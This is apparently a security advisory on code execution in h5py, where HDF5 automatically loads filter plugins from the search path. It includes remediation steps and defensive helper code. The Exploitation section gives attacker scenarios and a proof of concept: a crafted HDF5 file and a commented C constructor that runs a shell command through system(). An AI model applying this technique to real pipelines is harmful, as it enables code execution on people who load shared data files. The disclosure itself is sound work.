| # Arbitrary Code Execution via Automatic HDF5 Filter Plugin Loading in h5py |
|
|
| ## Target |
| - **Project:** h5py/h5py |
| - **URL:** https://github.com/h5py/h5py |
| - **Component:** HDF5 filter pipeline / dataset read path |
| - **CWE:** CWE-94 (Improper Control of Generation of Code, "Code Injection") |
|
|
| ## Severity: HIGH |
|
|
| ## Summary |
|
|
| When h5py reads a dataset that uses a custom (non-builtin) filter that is not already registered, the underlying HDF5 library automatically searches the directories in its plugin search path and loads a matching shared library (`.so`/`.dll`) filter plugin. h5py exposes APIs (`h5py.h5pl`) to manipulate this search path but does **nothing** to restrict or disable the automatic loading. If an attacker can also place a shared library in a directory on the plugin search path, a crafted HDF5 file that specifies a custom filter ID causes HDF5 to load that library and execute its code. The search path can be set through the `HDF5_PLUGIN_PATH` environment variable or through the `h5py.h5pl.append()`/`prepend()` APIs. |
|
|
| ## Vulnerable Code |
|
|
| ### File: `h5py/h5py/h5z.pyx` (lines 102-121) |
|
|
| ```python |
| @with_phil |
| def register_filter(uintptr_t cls_pointer_address): |
|     '''(INT cls_pointer_address) => BOOL |
| 
|     Register a new filter from the memory address of a buffer containing a |
|     ``H5Z_class1_t`` or ``H5Z_class2_t`` data structure describing the filter. |
| 
|     `cls_pointer_address` can be retrieved from a HDF5 filter plugin dynamic |
|     library:: |
| 
|         import ctypes |
| 
|         filter_clib = ctypes.CDLL("/path/to/my_hdf5_filter_plugin.so") |
|         filter_clib.H5PLget_plugin_info.restype = ctypes.c_void_p |
| 
|         h5py.h5z.register_filter(filter_clib.H5PLget_plugin_info()) |
| 
|     ''' |
|     return <int>H5Zregister(<const void *>cls_pointer_address) >= 0 |
| ``` |
|
|
| ### File: `h5py/h5py/h5pl.pyx` (lines 20-25) |
|
|
| ```python |
| cpdef append(const char* search_path): |
|     """(STRING search_path) |
|     Add a directory to the end of the plugin search path. |
|     """ |
|     H5PLappend(search_path) |
| ``` |
|
|
| ### File: `h5py/h5py/_hl/filters.py` (lines 295-299) |
| |
| When a dataset is created with an integer filter ID, h5py passes it directly to HDF5: |
| ```python |
| elif isinstance(compression, int): |
|     if not allow_unknown_filter and not h5z.filter_avail(compression): |
|         raise ValueError("Unknown compression filter number: %s" % compression) |
|     plist.set_filter(compression, h5z.FLAG_OPTIONAL, compression_opts) |
| ``` |
| |
| ### Automatic Plugin Loading (HDF5 library behavior) |
|
|
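| When `H5Dread()` is called on a dataset whose pipeline contains a filter ID that is not currently registered, HDF5 searches the directories on the plugin path for shared libraries (`.so`/`.dll`), loads each candidate (via `dlopen()` on POSIX systems), calls its `H5PLget_plugin_info()` to obtain the filter class, and registers a matching filter automatically. Any initialization code in a loaded library runs as soon as the library is opened. This happens transparently inside: |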
|
|
| - `h5py/h5py/_proxy.templ.pyx` line 120: `H5Dread(dset, mtype, mspace, fspace, dxpl, progbuf)` |
| - `h5py/h5py/_proxy.templ.pyx` line 151: `H5Dread(dset, dstype, cspace, fspace, dxpl, conv_buf)` |
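
The filter IDs a dataset declares can be inspected before any chunk is read, which gives a reader the chance to refuse pipelines it does not recognize. The following is a minimal sketch, assuming the low-level `get_create_plist()`, `get_nfilters()` and `get_filter()` calls behave as in current h5py releases. The helper names and the allowlist are illustrative and not part of h5py.

```python
# Filter IDs defined by the HDF5 library itself (deflate, shuffle, fletcher32,
# szip, nbit, scaleoffset), plus 32000, the LZF filter that h5py registers.
# This allowlist is an assumption for illustration; adjust it to your setup.
KNOWN_FILTER_IDS = frozenset({1, 2, 3, 4, 5, 6, 32000})


def dataset_filter_ids(dset):
    """Return the filter IDs in a dataset's pipeline without reading its data."""
    dcpl = dset.id.get_create_plist()
    # get_filter(i) returns a tuple whose first element is the filter ID.
    return [dcpl.get_filter(i)[0] for i in range(dcpl.get_nfilters())]


def unknown_filter_ids(filter_ids, known=KNOWN_FILTER_IDS):
    """Return the IDs outside the allowlist, which HDF5 might try to
    resolve through a plugin search."""
    return [fid for fid in filter_ids if fid not in known]
```

With a real file, this would be called as `unknown_filter_ids(dataset_filter_ids(f['payload']))` inside a `with h5py.File(path, 'r') as f:` block, and the read skipped if the result is non-empty.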
|
|
| ## Exploitation |
|
|
| ### Attack Scenario 1: Crafted HDF5 file + environment manipulation |
|
|
| 1. An attacker sets `HDF5_PLUGIN_PATH` to a directory they control (e.g., via `.bashrc` manipulation, Docker environment, or CI/CD configuration) |
| 2. They place a malicious `.so` file in that directory implementing the `H5PLget_plugin_info` symbol |
| 3. They provide a crafted HDF5 file with a dataset using a custom filter ID matching their plugin |
| 4. When the victim opens the file and reads the dataset with h5py, the malicious shared library is automatically loaded and its code executes |
|
|
| ### Attack Scenario 2: h5pl API abuse in shared environments |
|
|
| In applications where an untrusted user can influence the plugin path via `h5py.h5pl.append()` before a file is loaded, the path can be pointed at an attacker-controlled directory: |
|
|
| ```python |
| import h5py |
| 
| # Attacker injects malicious plugin path |
| h5py.h5pl.append(b'/attacker/controlled/path') |
| 
| # Later, when legitimate code reads a crafted HDF5 file: |
| with h5py.File('crafted.h5', 'r') as f: |
|     data = f['dataset'][:]  # Triggers plugin loading -> RCE |
| ``` |
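
One way to notice this kind of tampering is to audit the directories on the search path before reading untrusted files. The following is a rough sketch, assuming a POSIX system. `risky_plugin_dirs` is a hypothetical helper, and the list of directories would have to come from the process's actual search path (for example via `h5py.h5pl.size()` and `h5py.h5pl.get()`, where the installed h5py provides them).

```python
import os
import stat


def risky_plugin_dirs(paths):
    """Return entries that are missing or writable by group or other users."""
    risky = []
    for path in paths:
        try:
            mode = os.stat(path).st_mode
        except OSError:
            # A missing directory could be created later by someone else
            # if its parent is writable, so report it as well.
            risky.append(path)
            continue
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            risky.append(path)
    return risky
```

A non-empty result does not prove an attack; it only indicates that someone other than the directory's owner could drop a shared library where HDF5 will look for plugins.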
|
|
| ### Proof of Concept |
|
|
| ```python |
| import os |
| 
| # Step 1: Create a malicious shared library (filter plugin) |
| # In practice, compile a .so with H5PLget_plugin_info that runs arbitrary code |
| # For demonstration, this would be: |
| #   gcc -shared -o malicious_filter.so -fPIC malicious_filter.c |
| # Where malicious_filter.c contains: |
| #   #include <stdlib.h> |
| #   void __attribute__((constructor)) init() { system("id > /tmp/pwned"); } |
| 
| # Step 2: Set plugin path |
| # Done before importing h5py, on the assumption that HDF5 may read this |
| # variable only once, when the library initializes. |
| os.environ['HDF5_PLUGIN_PATH'] = '/tmp/malicious_plugins' |
| 
| import h5py |
| import numpy as np |
| 
| # Step 3: Create HDF5 file with custom filter |
| # 32000 is the LZF filter that h5py registers itself, so it would never |
| # trigger a plugin search; use an ID that nothing has registered. |
| CUSTOM_FILTER_ID = 60000 |
| 
| with h5py.File('/tmp/crafted.h5', 'w') as f: |
|     # Use allow_unknown_filter to bypass availability check during creation. |
|     # The plugin directory is already on the search path here, so HDF5 may |
|     # search it during this write as well. |
|     f.create_dataset( |
|         'payload', |
|         data=np.zeros(100), |
|         compression=CUSTOM_FILTER_ID, |
|         compression_opts=(0,), |
|         chunks=(100,), |
|         allow_unknown_filter=True |
|     ) |
| 
| # Step 4: When any user reads this file, the filter plugin is loaded |
| with h5py.File('/tmp/crafted.h5', 'r') as f: |
|     data = f['payload'][:]  # This triggers automatic plugin search and dlopen() |
| ``` |
|
|
| ## Impact |
|
|
| - **Arbitrary code execution** in the context of the process reading the HDF5 file |
| - This is particularly dangerous in: |
|   - Data science pipelines that process untrusted HDF5 files |
|   - ML model loading (Keras/TensorFlow can store models as HDF5 `.h5` files) |
|   - Scientific data sharing workflows |
|   - Jupyter notebook environments processing external data |
| - h5py provides no mechanism to disable automatic filter plugin loading |
| - The `allow_unknown_filter=True` parameter on dataset creation lets a file reference a filter that is not available at write time, so crafting a file that names an arbitrary filter ID requires no special tooling |
|
|
| ## Remediation |
|
|
| 1. **Provide an option to disable automatic filter plugin loading** when opening files for reading. HDF5 provides `H5PLset_loading_state()` (available since HDF5 1.8.15) to control which plugin types may be loaded. |
| 2. **Add a security warning** in the documentation about the risks of processing untrusted HDF5 files. |
| 3. **Consider defaulting to disabled plugin loading** for read-only file access, requiring explicit opt-in. |
| 4. **Validate or restrict plugin paths** added via `h5pl.append()`/`prepend()`. |
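
Until such an option exists in h5py, a caller can approximate item 1 from outside the library. The sketch below assumes the behavior described in the HDF5 documentation, where setting the `HDF5_PLUGIN_PRELOAD` environment variable to the special value `::` disables dynamic plugin loading. `hardened_hdf5_env` is a hypothetical helper name, and the environment must be in place before the HDF5 library initializes, which is why it is intended for a freshly started worker process.

```python
import os


def hardened_hdf5_env(base_env=None):
    """Return a copy of the environment with HDF5 plugin loading disabled."""
    env = dict(os.environ if base_env is None else base_env)
    # Drop any inherited search path so it cannot point at an untrusted directory.
    env.pop("HDF5_PLUGIN_PATH", None)
    # HDF5 documents "::" as the special value that turns plugin loading off.
    env["HDF5_PLUGIN_PRELOAD"] = "::"
    return env
```

The result can be passed as `env=hardened_hdf5_env()` to `subprocess.run()` when launching a worker that reads untrusted files. Filters compiled into HDF5 or registered directly by h5py should remain usable, since they are not resolved through the plugin search, but datasets that genuinely depend on a plugin will fail to decode in that worker.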
|
|
| ## References |
|
|
| - HDF5 Dynamic Plugin Loading: https://docs.hdfgroup.org/hdf5/develop/group___h5_p_l.html |
| - HDF5 Filter Plugins: https://github.com/HDFGroup/hdf5_plugins |
| - h5py filter documentation: https://docs.h5py.org/en/stable/high/dataset.html#filter-pipeline |
| |